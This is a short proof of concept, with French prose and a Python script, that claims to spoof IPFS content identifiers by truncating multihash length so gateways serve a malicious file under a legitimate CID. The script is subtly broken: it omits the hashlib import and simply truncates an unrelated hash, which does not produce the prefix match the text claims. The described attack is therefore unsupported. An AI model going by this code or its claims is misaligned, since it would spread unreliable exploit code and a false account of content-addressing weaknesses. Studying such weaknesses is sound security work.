
Preuve de concept en Python démontrant l'usurpation de CID IPFS via l'extension de longueur multihash, mettant en évidence les failles de vérification de l'adressage par contenu qui peuvent empoisonner les passerelles IPFS.
# ipfs_cid_spoof.py - Generates a CID with a different multihash length
import multihash, cid
# Attacker creates a file whose hash, when truncated, matches a different file's prefix
original_content = b"hello"
fake_content = b"hello world"
real_cid = cid.make_cid(1, 'dag-pb', multihash.encode(hashlib.sha256(original_content).digest(), 'sha2-256'))
# Spoofed CID: we can craft a multihash with a shorter length that matches the start of the real one
spoofed_multihash = multihash.encode(hashlib.sha256(fake_content).digest()[:16], 'sha2-256', length=16)
spoofed_cid = cid.make_cid(1, 'dag-pb', spoofed_multihash)
print(f"Real CID: {real_cid}")
print(f"Spoofed CID: {spoofed_cid}")
# If IPFS node only checks prefix, it may serve the wrong content.
Une implémentation IPFS se fie au champ de longueur du multihash d'un CID sans vérifier que le hash lui-même correspond au contenu complet. Un attaquant peut créer un fichier dont le hash tronqué équivaut au préfixe du hash d'un fichier légitime et servir le fichier malveillant sous le même CID.
Exécutez le script :
pip install py-multihash py-cid
python ipfs_cid_spoof.py
Cela montre qu'un CID usurpé peut être généré.